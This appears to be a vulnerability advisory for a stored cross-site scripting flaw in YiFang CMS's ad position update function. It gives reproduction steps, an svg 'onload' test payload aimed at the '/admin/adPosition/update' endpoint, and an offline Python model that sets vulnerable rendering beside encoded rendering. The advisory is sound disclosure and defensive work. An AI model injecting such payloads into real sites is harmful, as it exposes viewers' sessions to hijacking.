YiFang CMS Cross-Site Scripting Vulnerability in the Extended Management Module

Vulnerability

A stored cross-site scripting (XSS) vulnerability has been identified in YiFang CMS versions through 2.0.5. The issue resides in the Extended Management Module, in the 'update' function of 'app/db/admin/D_adPosition.php'. The 'name' and 'index' parameters accepted by that function are written to the database without sanitization or output encoding, and the stored values are rendered when the ad placement list is viewed, so any script embedded in them executes in the browser of the user viewing the list. The vulnerability can be exploited remotely, but it requires an authenticated account that can reach the update function, and user interaction, since a victim has to open the ad placement list for the stored payload to run.

Impact

Exploitation of this vulnerability allows an attacker with access to the ad position update interface to inject scripts that execute in the browser and session context of any user who views the ad placement list.

Reproduction

To reproduce this vulnerability, authenticate, navigate to the ad position update interface, and send a POST request to '/admin/adPosition/update' with the 'name' or 'index' parameter set to a crafted HTML payload, for example an element carrying an 'onload' event handler. The stored payload executes when the ad placement list is next accessed. To confirm the finding without relying on a visible alert, inspect the HTML of the list page: the injected markup appears verbatim rather than as '&lt;' and '&gt;' entities.
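The following Python model is an added illustration and is not YiFang CMS code (the CMS is written in PHP). It reproduces offline the flow described in the Vulnerability and Reproduction sections: a crafted 'name' value is submitted to the update endpoint, stored verbatim, and rendered into the ad placement list without encoding, and a check reports whether the payload survives into a live event handler. The 'svg onload' payload, the marker string, the store class and the hardened variants (an integer check on 'index' and HTML encoding at output, which is what PHP's htmlspecialchars($v, ENT_QUOTES, 'UTF-8') does) are constructed for the example and are not the vendor's fix.

```python
"""Offline model of the stored XSS described in the advisory.

Everything here is illustrative; none of it is YiFang CMS code.
"""
import html
import re
from urllib.parse import urlencode

UPDATE_PATH = "/admin/adPosition/update"  # endpoint named in the advisory

# Constructed payload: an element with an 'onload' handler, as the
# reproduction section describes. The marker makes the check unambiguous.
MARKER = "xsscheck1"
PAYLOAD = f"<svg onload=\"alert('{MARKER}')\">"


def build_update_request(name: str, index: str) -> str:
    """Return the URL-encoded POST body an authenticated client would send
    to UPDATE_PATH (the session cookie is assumed to be attached by the client)."""
    return urlencode({"name": name, "index": index})


class AdPositionStore:
    """Hypothetical stand-in for the table written by D_adPosition.php."""

    def __init__(self):
        self.rows = []

    def update_unsafe(self, name, index):
        # Vulnerable behaviour: whatever the client sent is stored verbatim.
        self.rows.append({"name": name, "index": index})

    def update_safe(self, name, index):
        # Hardened behaviour (illustrative): 'index' must be a non-negative
        # integer and 'name' is length-bounded. Validation alone does not fix
        # XSS; the output encoding in render_list_safe() does.
        if not re.fullmatch(r"\d{1,10}", index):
            raise ValueError("index must be a non-negative integer")
        if len(name) > 64:
            raise ValueError("name too long")
        self.rows.append({"name": name, "index": int(index)})


def render_list_unsafe(store):
    """Vulnerable rendering: stored values interpolated straight into HTML."""
    cells = "".join(
        f"<tr><td>{row['index']}</td><td>{row['name']}</td></tr>"
        for row in store.rows
    )
    return f"<table>{cells}</table>"


def render_list_safe(store):
    """Hardened rendering: every stored value is HTML-encoded at output,
    with quotes escaped so attribute contexts are covered too."""
    cells = "".join(
        "<tr><td>{}</td><td>{}</td></tr>".format(
            html.escape(str(row["index"]), quote=True),
            html.escape(str(row["name"]), quote=True),
        )
        for row in store.rows
    )
    return f"<table>{cells}</table>"


def payload_survives(page: str) -> bool:
    """The check an auditor runs on the ad placement list response: does the
    marker appear and is there a real (unencoded) tag carrying an onload
    attribute? Encoded '&lt;svg onload=' does not match, since no '<' precedes it."""
    return MARKER in page and re.search(r"<\w+[^>]*\bonload\s*=", page) is not None


def demo():
    """Run the vulnerable and hardened paths side by side."""
    vuln = AdPositionStore()
    vuln.update_unsafe(PAYLOAD, "1")
    fixed = AdPositionStore()
    fixed.update_safe(PAYLOAD, "1")
    return {
        "request_body": build_update_request(PAYLOAD, "1"),
        "vulnerable": payload_survives(render_list_unsafe(vuln)),
        "hardened": payload_survives(render_list_safe(fixed)),
    }


if __name__ == "__main__":
    print(demo())
```

Against a real target the same payload_survives() check is applied to the HTTP response of the ad placement list after the POST; a marker chosen per test run avoids confusing an old stored payload with the one just submitted.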

Added: Feb 22, 2026, 8:22 AM
Updated: Feb 22, 2026, 8:22 AM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 5.4
exploitability: 6.3
remediation: 0.0
relevance: 3.3
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these eight key vulnerability categories, which are then combined to calculate the overall risk score.